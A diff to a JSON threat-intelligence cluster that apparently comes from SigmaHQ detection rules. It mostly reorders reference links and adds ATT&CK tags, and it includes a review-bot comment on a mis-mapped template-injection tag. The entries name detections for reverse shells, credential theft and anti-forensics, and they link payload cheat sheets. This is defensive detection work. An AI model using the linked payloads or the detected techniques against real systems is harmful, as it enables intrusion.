@@ -86086,12 +88624,24 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/payloadbox/ssti-payloads", "https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection", + "https://github.com/payloadbox/ssti-payloads", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_ssti_in_access_logs.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1221" + ] }, + "related": [ + { + "dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ada3bc4f-f0fd-42b9-ba91-e105e8af7342", "value": "Server Side Template Injection Strings" }, @@ -86535,8 +89085,8 @@ "logsource.product": "No established product", "refs": [ "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_telegram_api.yml" ], "tags": [ 
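Review bot: The SSTI rule is newly mapped to `attack.defense_evasion` / `attack.t1221` with an "almost-certain" relation to `dc31fe1e-d722-49da-8f5f-92c7b5aff534`, but ATT&CK T1221 (Template Injection) covers loading malicious remote templates into Office documents to evade detection, not server-side template injection in a web application; the name match is coincidental. The sibling SQLi, Java payload and JNDI entries in this patch map the same access-log attack-string pattern to `attack.initial_access` / `attack.t1190` (`3f886f2a-874f-4333-b794-aa6075009b1c`), and SSTI belongs with them. As this file appears to be generated from the SigmaHQ rule files, the tags should be corrected in `web_ssti_in_access_logs.yml` upstream (`attack.initial_access`, `attack.t1190`) and the cluster regenerated, so the `related` link stops asserting a T1221 relationship with high confidence.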
@@ -86627,14 +89177,14 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://perishablepress.com/blacklist/ua-2013.txt", - "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", - "https://pbs.twimg.com/media/FtYbfsDXoAQ1Y8M?format=jpg&name=large", - "https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q", - "https://twitter.com/crep1x/status/1635034100213112833", - "http://www.botopedia.org/search?searchword=scan&searchphrase=all", "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents", "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", + "https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q", + "https://pbs.twimg.com/media/FtYbfsDXoAQ1Y8M?format=jpg&name=large", + "http://www.botopedia.org/search?searchword=scan&searchphrase=all", + "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", + "https://twitter.com/crep1x/status/1635034100213112833", + "https://perishablepress.com/blacklist/ua-2013.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_malware.yml" ], "tags": [ @@ -86667,9 +89217,9 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638", - "https://github.com/Cisco-Talos/IOCs/tree/80caca039988252fbb3f27a2e89c2f2917f582e0/2022/11", "https://blog.talosintelligence.com/ipfs-abuse/", + "https://github.com/Cisco-Talos/IOCs/tree/80caca039988252fbb3f27a2e89c2f2917f582e0/2022/11", + "https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_susp_ipfs_cred_harvest.yml" ], "tags": [ 
@@ -86745,8 +89295,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://rclone.org/", "https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone", + "https://rclone.org/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_rclone.yml" ], "tags": [ @@ -87098,9 +89648,9 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://www.spamhaus.org/statistics/tlds/", "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap", "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf", + "https://www.spamhaus.org/statistics/tlds/", "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_download_susp_tlds_blacklist.yml" ], @@ -87360,8 +89910,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", + "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_hacktool.yml" ], "tags": [ 
@@ -87657,8 +90207,8 @@ "logsource.category": "file_event", "logsource.product": "macos", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md", "https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_emond_launch_daemon.yml" ], "tags": [ @@ -87733,8 +90283,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://redcanary.com/blog/applescript/", "https://objective-see.org/blog/blog_0x4B.html", + "https://redcanary.com/blog/applescript/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_office_susp_child_processes.yml" ], "tags": [ @@ -87851,8 +90401,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_screencapture.yml" ], "tags": [ 
@@ -88060,9 +90610,9 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1078.003/T1078.003.md", "https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/persistence_enable_root_account.toml", "https://ss64.com/osx/dsenableroot.html", + "https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1078.003/T1078.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_dsenableroot_enable_root_account.yml" ], "tags": [ @@ -88145,8 +90695,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://fr.slideshare.net/codeblue_jp/cb19-recent-apt-attack-on-crypto-exchange-employees-by-heungsoo-kang", "https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_initial_access_suspicious_browser_childproc.toml", + "https://fr.slideshare.net/codeblue_jp/cb19-recent-apt-attack-on-crypto-exchange-employees-by-heungsoo-kang", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_browser_child_process.yml" ], "tags": [ @@ -88197,8 +90747,8 @@ "logsource.product": "macos", "refs": [ "https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html", - "https://github.com/MythicAgents/typhon/", "https://www.zoocoup.org/casper/jamf_cheatsheet.pdf", + "https://github.com/MythicAgents/typhon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_jamf_susp_child.yml" ], "tags": [ 
@@ -88221,8 +90771,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "macos",
 "refs": [
- "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685",
 "https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/",
+ "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml"
 ],
 "tags": [
@@ -88306,8 +90856,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "macos",
 "refs": [
- "https://www.manpagez.com/man/8/PlistBuddy/",
 "https://redcanary.com/blog/clipping-silver-sparrows-wings/",
+ "https://www.manpagez.com/man/8/PlistBuddy/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_persistence_via_plistbuddy.yml"
 ],
 "tags": [
@@ -88389,9 +90939,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "macos",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md",
 "https://linux.die.net/man/1/truncate",
 "https://linux.die.net/man/1/dd",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_binary_padding.yml"
 ],
 "tags": [
@@ -88624,8 +91174,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "macos",
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset",
 "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08",
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml"
 ],
 "tags": [
@@ -88682,8 +91232,8 @@
 "logsource.product": "macos",
 "refs": [
 "https://www.manpagez.com/man/8/firmwarepasswd/",
- "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml",
 "https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web",
+ "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml"
 ],
 "tags": [
@@ -89035,8 +91585,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "macos",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos",
 "https://ss64.com/osx/dseditgroup.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_dseditgroup_add_to_admin_group.yml"
 ],
 "tags": [
@@ -89196,8 +91746,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "macos",
 "refs": [
- "https://ss64.com/osx/sysadminctl.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos",
+ "https://ss64.com/osx/sysadminctl.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml"
 ],
 "tags": [
@@ -89264,9 +91814,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "macos",
 "refs": [
- "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/",
 "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97",
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset",
+ "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml"
 ],
 "tags": [
@@ -89388,8 +91938,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "macos",
 "refs": [
- "https://gist.github.com/Capybara/6228955",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md",
+ "https://gist.github.com/Capybara/6228955",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml"
 ],
 "tags": [
@@ -89423,8 +91973,8 @@
 "logsource.product": "macos",
 "refs": [
 "https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html",
- "https://github.com/MythicAgents/typhon/",
 "https://www.zoocoup.org/casper/jamf_cheatsheet.pdf",
+ "https://github.com/MythicAgents/typhon/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_jamf_usage.yml"
 ],
 "tags": [
@@ -89481,10 +92031,10 @@
 "logsource.category": "No established category",
 "logsource.product": "qualys",
 "refs": [
- "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
- "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
 "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
 "https://www.cisecurity.org/controls/cis-controls-list/",
+ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml"
 ],
 "tags": "No established tags"
@@ -89503,9 +92053,9 @@
 "logsource.category": "No established category",
 "logsource.product": "qualys",
 "refs": [
- "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
 "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
 "https://www.cisecurity.org/controls/cis-controls-list/",
+ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml"
 ],
 "tags": "No established tags"
@@ -89526,9 +92076,9 @@
 "logsource.category": "No established category",
 "logsource.product": "No established product",
 "refs": [
- "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
 "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
 "https://www.cisecurity.org/controls/cis-controls-list/",
+ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml"
 ],
 "tags": "No established tags"
@@ -89733,8 +92283,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/",
 "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor",
+ "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml"
 ],
 "tags": [
@@ -89964,8 +92514,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/",
 "https://linux.die.net/man/1/xclip",
+ "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml"
 ],
 "tags": [
@@ -90031,9 +92581,9 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://linux.die.net/man/8/insmod",
 "https://man7.org/linux/man-pages/man8/kmod.8.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md",
+ "https://linux.die.net/man/8/insmod",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml"
 ],
 "tags": [
@@ -90102,8 +92652,8 @@
 "logsource.product": "linux",
 "refs": [
 "https://www.glitch-cat.com/p/green-lambert-and-attack",
- "https://objective-see.org/blog/blog_0x68.html",
 "https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat",
+ "https://objective-see.org/blog/blog_0x68.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_unix_shell_configuration_modification.yml"
 ],
 "tags": [
@@ -90136,9 +92686,9 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://imagemagick.org/",
- "https://linux.die.net/man/1/import",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md",
+ "https://linux.die.net/man/1/import",
+ "https://imagemagick.org/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml"
 ],
 "tags": [
@@ -90171,8 +92721,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://firewalld.org/documentation/man-pages/firewall-cmd.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md",
+ "https://firewalld.org/documentation/man-pages/firewall-cmd.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml"
 ],
 "tags": [
@@ -90238,10 +92788,10 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://mn3m.info/posts/suid-vs-capabilities/",
- "https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099",
- "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/",
 "https://man7.org/linux/man-pages/man8/getcap.8.html",
+ "https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099",
+ "https://mn3m.info/posts/suid-vs-capabilities/",
+ "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml"
 ],
 "tags": [
@@ -90316,8 +92866,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html",
 "https://blog.aquasec.com/container-security-tnt-container-attack",
+ "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_modify_system_firewall.yml"
 ],
 "tags": [
@@ -90750,8 +93300,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/",
 "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor",
+ "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml"
 ],
 "tags": [
@@ -90992,10 +93542,10 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
+ "https://man7.org/linux/man-pages/man1/passwd.1.html",
 "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md",
 "https://linux.die.net/man/1/chage",
- "https://man7.org/linux/man-pages/man1/passwd.1.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml"
 ],
 "tags": [
@@ -91096,9 +93646,9 @@
 "logsource.product": "linux",
 "refs": [
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md",
- "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing",
- "https://linux.die.net/man/8/pam_tty_audit",
 "https://access.redhat.com/articles/4409591#audit-record-types-2",
+ "https://linux.die.net/man/8/pam_tty_audit",
+ "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml"
 ],
 "tags": [
@@ -91205,9 +93755,9 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07",
- "https://access.redhat.com/articles/4409591#audit-record-types-2",
 "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files",
+ "https://access.redhat.com/articles/4409591#audit-record-types-2",
+ "https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml"
 ],
 "tags": [
@@ -91240,8 +93790,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan",
+ "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/",
 "https://book.hacktricks.xyz/shells/shells/linux",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_dev_tcp.yml"
 ],
@@ -91399,8 +93949,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://redcanary.com/blog/ebpf-malware/",
 "https://man7.org/linux/man-pages/man7/bpf-helpers.7.html",
+ "https://redcanary.com/blog/ebpf-malware/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_potential_susp_ebpf_activity.yml"
 ],
 "tags": [
@@ -91545,9 +94095,9 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://digital.nhs.uk/cyber-alerts/2018/cc-2825",
 "https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid",
 "https://linux.die.net/man/8/useradd",
+ "https://digital.nhs.uk/cyber-alerts/2018/cc-2825",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_privileged_user_creation.yml"
 ],
 "tags": [
@@ -91712,9 +94262,9 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb",
- "http://pastebin.com/FtygZ1cg",
 "https://web.archive.org/web/20170319121015/http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html",
+ "http://pastebin.com/FtygZ1cg",
+ "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb",
 "https://artkond.com/2017/03/23/pivoting-guide/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml"
 ],
@@ -91748,8 +94298,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md",
+ "https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_clear_cmd_history.yml"
 ],
 "tags": [
@@ -91980,8 +94530,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml",
 "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c",
+ "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml"
 ],
 "tags": [
@@ -92159,8 +94709,8 @@
 "refs": [
 "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html",
 "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection",
- "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection",
 "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/",
+ "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_wget_download_file_in_tmp_dir.yml"
 ],
 "tags": [
@@ -92196,8 +94746,8 @@
 "refs": [
 "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html",
 "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection",
- "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection",
 "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/",
+ "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml"
 ],
 "tags": [
@@ -92310,8 +94860,8 @@
 "logsource.category": "file_event",
 "logsource.product": "linux",
 "refs": [
- "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/",
 "https://www.makeuseof.com/how-to-install-and-use-doas/",
+ "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_doas_conf_creation.yml"
 ],
 "tags": [
@@ -92415,8 +94965,20 @@
 "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.execution",
+ "attack.t1059.004"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871",
 "value": "Linux Reverse Shell Indicator"
 },
@@ -92436,8 +94998,20 @@
 "https://www.poolwatch.io/coin/monero",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.impact",
+ "attack.t1496"
+ ]
 },
+ "related": [
+ {
